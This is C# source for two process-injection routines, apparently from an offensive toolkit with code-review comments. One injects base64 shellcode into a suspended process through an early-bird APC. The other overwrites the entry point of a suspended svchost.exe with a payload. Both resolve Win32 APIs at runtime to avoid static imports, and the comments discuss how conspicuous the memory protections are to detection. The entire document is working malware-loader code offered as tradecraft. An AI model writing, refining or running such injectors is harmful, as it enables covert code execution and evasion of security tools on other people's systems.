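    /// <summary>
    /// Tradecraft sample ("early bird" APC injection): launches <paramref name="b"/> suspended,
    /// copies the base64-decoded shellcode into that process, downgrades the page to RX and queues the
    /// shellcode as a user-mode APC on the primary thread. Because the thread is resumed right after the
    /// APC is queued, the payload runs before the host reaches its own entry point. Every Win32 call is
    /// resolved at runtime through <c>TinySharpSploit.GetLibraryAddress</c> rather than a static P/Invoke.
    /// </summary>
    /// <param name="a">Base64-encoded, position-independent shellcode.</param>
    /// <param name="b">Path of the executable used as the host process.</param>
    /// <exception cref="ArgumentException">An argument is null/empty, or the shellcode decodes to nothing.</exception>
    /// <exception cref="FormatException"><paramref name="a"/> is not valid base64.</exception>
    /// <exception cref="InvalidOperationException">An export could not be resolved or a Win32 call failed.
    /// If the host was already created it is left alive and suspended (see the note at the end).</exception>
    public static void Exec(string a, string b)
    {
        if (string.IsNullOrEmpty(a)) throw new ArgumentException("shellcode must not be empty", nameof(a));
        if (string.IsNullOrEmpty(b)) throw new ArgumentException("host process path must not be empty", nameof(b));

        byte[] shellcode = System.Convert.FromBase64String(a);
        if (shellcode.Length == 0) throw new ArgumentException("decoded shellcode is empty", nameof(a));

        string processPath = b;

        // Resolves one kernel32 export and refuses to continue on a null pointer; the original fed the
        // result straight into GetDelegateForFunctionPointer unchecked.
        IntPtr Resolve(string export)
        {
            IntPtr p = TinySharpSploit.GetLibraryAddress("kernel32.dll", export);
            if (p == IntPtr.Zero) throw new InvalidOperationException("could not resolve kernel32!" + export);
            return p;
        }

        // Builds the exception for a failed Win32 call. NOTE(review): GetLastWin32Error is only meaningful
        // if the delegate types in DELEGATES are declared with SetLastError = true -- verify that, otherwise
        // the error code in the message is noise.
        InvalidOperationException Failed(string api)
        {
            return new InvalidOperationException(api + " failed (Win32 error " + Marshal.GetLastWin32Error() + ")");
        }

        STRUCTS.STARTUPINFO         si = new STRUCTS.STARTUPINFO();
        STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION();

        // CREATE_SUSPENDED: the primary thread has not executed anything yet when the APC is queued,
        // which is what lets the payload run ahead of the host's entry point.
        IntPtr pointer = Resolve("CreateProcessA");
        DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess;
        bool success = CreateProcess(processPath, null, IntPtr.Zero, IntPtr.Zero, false, STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
        if (!success) throw Failed("CreateProcessA");

        // 0x1000 | 0x2000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE. The RWX allocation is
        // the most conspicuous step of this sample; the page is dropped to RX once the payload is written.
        pointer = Resolve("VirtualAllocEx");
        DELEGATES.VirtualAllocEx virtualAllocEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualAllocEx)) as DELEGATES.VirtualAllocEx;
        IntPtr alloc = virtualAllocEx(pi.hProcess, IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
        if (alloc == IntPtr.Zero) throw Failed("VirtualAllocEx");

        pointer = Resolve("WriteProcessMemory");
        DELEGATES.WriteProcessMemory writeProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory;
        writeProcessMemory(pi.hProcess, alloc, shellcode, (uint)shellcode.Length, out UIntPtr bytesWritten);
        // Verified through the byte count rather than the return value, so the check does not depend on
        // how DELEGATES.WriteProcessMemory declares its return type (not visible in this listing).
        if ((ulong)bytesWritten != (ulong)shellcode.Length) throw Failed("WriteProcessMemory (short write)");

        // THREAD_SET_CONTEXT is all QueueUserAPC requires. pi.hThread already refers to this thread, so the
        // extra OpenThread is redundant and its handle is never closed; kept for parity with the original.
        pointer = Resolve("OpenThread");
        DELEGATES.OpenThread openThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.OpenThread)) as DELEGATES.OpenThread;
        IntPtr tpointer = openThread(STRUCTS.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
        if (tpointer == IntPtr.Zero) throw Failed("OpenThread");

        // 0x20 = PAGE_EXECUTE_READ: remove the writable bit now that the payload is in place. The return
        // value is not checked because the delegate's return type is not visible here; a failure leaves
        // the page RWX, which still executes -- noisier, not broken.
        uint oldProtect = 0;
        pointer = Resolve("VirtualProtectEx");
        DELEGATES.VirtualProtectEx virtualProtectEx = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.VirtualProtectEx)) as DELEGATES.VirtualProtectEx;
        virtualProtectEx(pi.hProcess, alloc, shellcode.Length, 0x20, out oldProtect);

        // The shellcode address itself is the APC routine; it must therefore be position independent.
        pointer = Resolve("QueueUserAPC");
        DELEGATES.QueueUserAPC queueUserAPC = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.QueueUserAPC)) as DELEGATES.QueueUserAPC;
        queueUserAPC(alloc, tpointer, IntPtr.Zero);

        pointer = Resolve("ResumeThread");
        DELEGATES.ResumeThread resumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread;
        resumeThread(pi.hThread);

        // NOTE(review): pi.hProcess, pi.hThread and tpointer are never closed, and on any throw above the
        // suspended host is left running. Fixing that needs CloseHandle / TerminateProcess delegates,
        // which DELEGATES does not visibly provide in this listing.
    }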
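        /// <summary>
        /// Tradecraft sample (entry-point hijack): creates the host process suspended, reads its PEB to find
        /// the image base, parses the in-memory PE headers to locate AddressOfEntryPoint, overwrites the entry
        /// point with the payload returned by <c>buf()</c> and resumes the primary thread, so the payload runs
        /// in place of the host's real entry point. All Win32/NT calls are resolved at runtime through
        /// <c>Invoke.GetLibraryAddress</c> rather than a static P/Invoke table.
        /// </summary>
        /// <param name="args">Optional: <c>args[0]</c> overrides the host executable; the default is
        /// <c>C:\windows\system32\svchost.exe</c>, as in the original.</param>
        /// <exception cref="PlatformNotSupportedException">Not a 64-bit process: the PEB offset and the
        /// 8-byte pointer read below are x64-specific.</exception>
        /// <exception cref="InvalidOperationException">A Win32/NT call failed, a read/write was short, or
        /// the host's PE headers do not look like a PE image. The suspended host is left alive in that case.</exception>
        static void Main(string[] args)
        {
            // PEB+0x10 (ImageBaseAddress) and BitConverter.ToInt64 over an IntPtr.Size buffer are both x64
            // assumptions; on x86 the original would have thrown ArgumentException from ToInt64 on a 4-byte buffer.
            if (IntPtr.Size != 8)
            {
                throw new PlatformNotSupportedException("this injector only supports 64-bit processes");
            }

            string hostPath = (args != null && args.Length > 0) ? args[0] : "C:\\windows\\system32\\svchost.exe";

            IntPtr pointer = Invoke.GetLibraryAddress("kernel32.dll", "CreateProcessA");
            DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess;

            pointer = Invoke.GetLibraryAddress("Ntdll.dll", "ZwQueryInformationProcess");
            DELEGATES.ZwQueryInformationProcess ZwQueryInformationProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ZwQueryInformationProcess)) as DELEGATES.ZwQueryInformationProcess;

            pointer = Invoke.GetLibraryAddress("kernel32.dll", "ReadProcessMemory");
            DELEGATES.ReadProcessMemory ReadProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ReadProcessMemory)) as DELEGATES.ReadProcessMemory;

            pointer = Invoke.GetLibraryAddress("kernel32.dll", "WriteProcessMemory");
            DELEGATES.WriteProcessMemory WriteProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory;

            pointer = Invoke.GetLibraryAddress("kernel32.dll", "ResumeThread");
            DELEGATES.ResumeThread ResumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread;

            STRUCTS.STARTUPINFO               si  = new STRUCTS.STARTUPINFO();
            STRUCTS.PROCESS_INFORMATION       pi  = new STRUCTS.PROCESS_INFORMATION();
            STRUCTS.SECURITY_ATTRIBUTES       lpa = new STRUCTS.SECURITY_ATTRIBUTES();
            STRUCTS.SECURITY_ATTRIBUTES       lta = new STRUCTS.SECURITY_ATTRIBUTES();
            STRUCTS.PROCESS_BASIC_INFORMATION pbi = new STRUCTS.PROCESS_BASIC_INFORMATION();
            uint temp = 0;

            // CREATE_SUSPENDED: nothing in the host runs until the entry point has been replaced.
            // NOTE(review): GetLastWin32Error below is only meaningful if the DELEGATES types are declared
            // with SetLastError = true -- verify that.
            bool succ = CreateProcess(null, hostPath, ref lpa, ref lta, false, STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
            if (!succ)
            {
                throw new InvalidOperationException("CreateProcessA failed for '" + hostPath + "' (Win32 error " + Marshal.GetLastWin32Error() + ")");
            }

            // 0x0 = ProcessBasicInformation; the structure is six pointer-sized fields. Zw* returns an
            // NTSTATUS, so anything other than 0 (STATUS_SUCCESS) is a failure.
            UInt32 status = ZwQueryInformationProcess(pi.hProcess, 0x0, ref pbi, (uint)(IntPtr.Size * 6), ref temp);
            if (status != 0)
            {
                throw new InvalidOperationException("ZwQueryInformationProcess failed, NTSTATUS 0x" + status.ToString("X8"));
            }

            // PEB->ImageBaseAddress lives at +0x10 on x64.
            IntPtr ptrToBaseImage = (IntPtr)((Int64)pbi.PebBaseAddress + 0x10);

            byte[] addrBuf = new byte[IntPtr.Size];
            IntPtr nread   = IntPtr.Zero;

            succ = ReadProcessMemory(pi.hProcess, ptrToBaseImage, addrBuf, addrBuf.Length, out nread);
            if (!succ || (long)nread != addrBuf.Length)
            {
                throw new InvalidOperationException("ReadProcessMemory(PEB.ImageBaseAddress) failed (Win32 error " + Marshal.GetLastWin32Error() + ")");
            }
            IntPtr processBase = (IntPtr)BitConverter.ToInt64(addrBuf, 0);

            // DOS header + PE headers. 0x200 bytes is enough for ordinary binaries; e_lfanew is range-checked
            // below instead of trusting it, which otherwise surfaces as an ArgumentOutOfRangeException.
            byte[] data = new byte[0x200];
            succ = ReadProcessMemory(pi.hProcess, processBase, data, data.Length, out nread);
            if (!succ || (long)nread != data.Length)
            {
                throw new InvalidOperationException("ReadProcessMemory(image headers) failed (Win32 error " + Marshal.GetLastWin32Error() + ")");
            }
            if (data[0] != 0x4D || data[1] != 0x5A)
            {
                throw new InvalidOperationException("host image base does not start with an MZ header");
            }

            uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3c);   // IMAGE_DOS_HEADER.e_lfanew
            // Need e_lfanew + 0x28 + 4 <= data.Length; written without the addition so a huge e_lfanew cannot wrap.
            if (e_lfanew_offset > (uint)data.Length - 0x2C)
            {
                throw new InvalidOperationException("e_lfanew 0x" + e_lfanew_offset.ToString("X") + " points past the 0x200 header bytes read");
            }
            // PE signature (4) + COFF header (20) + OptionalHeader.AddressOfEntryPoint (+0x10) = +0x28,
            // the same offset for PE32 and PE32+.
            uint   opthdr              = e_lfanew_offset + 0x28;
            uint   entrypoint_rva      = BitConverter.ToUInt32(data, (int)opthdr);
            IntPtr addressofentrypoint = (IntPtr)(entrypoint_rva + (UInt64)processBase);

            // buf() was evaluated twice in the original (once for the data, once for the length); evaluate
            // it once so the two cannot disagree. The write is verified through the byte count because the
            // delegate's return type is not visible in this listing.
            byte[] payload = buf();
            WriteProcessMemory(pi.hProcess, addressofentrypoint, payload, payload.Length, out nread);
            if ((long)nread != payload.Length)
            {
                throw new InvalidOperationException("WriteProcessMemory(entry point) was short: " + (long)nread + " of " + payload.Length + " bytes");
            }

            ResumeThread(pi.hThread);

            // NOTE(review): pi.hProcess and pi.hThread are never closed, and on any throw above the suspended
            // host is left alive. Fixing that needs CloseHandle / TerminateProcess delegates, which DELEGATES
            // does not visibly provide here.
        }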